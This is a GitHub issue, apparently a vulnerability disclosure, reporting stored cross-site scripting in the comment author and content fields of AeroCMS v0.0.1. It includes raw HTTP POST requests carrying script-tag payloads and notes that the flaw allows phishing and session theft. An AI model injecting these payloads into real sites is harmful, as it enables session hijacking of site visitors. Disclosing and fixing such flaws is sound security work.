You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on May 8, 2023. It is now read-only.
Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.
"comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be
Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.
CMS Version:
v0.0.1
Affected URL:
http://127.0.0.1/AeroCMS/post.php
Steps to Reproduce:
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test&comment_email=[email protected]&comment_content=test&create_comment=
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test"><script>alert(111)</script>&comment_email=[email protected]&comment_content=test"><script>alert('XSS')</script>&create_comment=
Proof of Concept:
You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.
Stored.XSS.on.AeroCMS.mp4
Impact:
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
The text was updated successfully, but these errors were encountered: